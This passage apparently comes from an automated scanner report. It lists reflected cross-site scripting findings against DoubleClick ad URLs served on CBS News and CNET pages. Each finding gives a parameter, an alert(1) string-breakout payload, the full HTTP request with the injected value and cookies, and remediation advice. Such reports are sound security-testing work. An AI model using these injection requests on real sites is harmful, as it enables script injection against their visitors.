__gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac86f"-alert(1)-"e9cbd23bb73 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985Eac86f"-alert(1)-"e9cbd23bb73&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 404ce"-alert(1)-"ab245d7300d was submitted in the sg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230404ce"-alert(1)-"ab245d7300d&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d202"-alert(1)-"0e7554cedd3 was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=1623d202"-alert(1)-"0e7554cedd3&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24b5c"-alert(1)-"693c8060cdc was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=1368224b5c"-alert(1)-"693c8060cdc&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.32&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72656"-alert(1)-"4f84709e101 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N553.8481.CBSINTERNETNETWORK/B4970757.4;sz=300x250;pc=cbs509230;click0=http://adlog.com.com/adlog/e/r=13682&sg=509230&o=100%253a&h=cn&p=2&b=55&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.3272656"-alert(1)-"4f84709e101&event=58/;ord=2011.04.27.23.17.32? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.cbsnews.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page ...[SNIP]... 0&pp=100&e=&rqid=01phx1-ad-e17:4DB8370F82985E&orh=cbsnews.com&oepartner=&epartner=&ppartner=&pdom=www.cbsnews.com&cpnmodule=&count=&ra=173.193.214.243&pg=1303946232760451020641252&t=2011.04.27.23.17.3272656"-alert(1)-"4f84709e101&event=58/http://personalsavings.americanexpress.com/savings-product.html"); var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
The value of the b request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82c48'-alert(1)-'d6f94ea770e was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=582c48'-alert(1)-'d6f94ea770e&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4704"-alert(1)-"c0ca4634e03 was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5a4704"-alert(1)-"c0ca4634e03&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccf37"-alert(1)-"dd1f54e8ddd was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815ccf37"-alert(1)-"dd1f54e8ddd&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c58a'-alert(1)-'e02ed8d2af6 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=200578159c58a'-alert(1)-'e02ed8d2af6&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the count request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b88b2'-alert(1)-'0ab3a2f4648 was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=b88b2'-alert(1)-'0ab3a2f4648&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5db19"-alert(1)-"34a1cc021fa was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=5db19"-alert(1)-"34a1cc021fa&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 839f6"-alert(1)-"d40e86f6f52 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=839f6"-alert(1)-"d40e86f6f52&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f2cf'-alert(1)-'434cc702ff0 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=2f2cf'-alert(1)-'434cc702ff0&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the e request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4884'-alert(1)-'1fd9fbb2e3b was submitted in the e parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3a4884'-alert(1)-'1fd9fbb2e3b&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd276"-alert(1)-"9e7d663adcd was submitted in the e parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3dd276"-alert(1)-"9e7d663adcd&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35a62"-alert(1)-"491575274f was submitted in the epartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
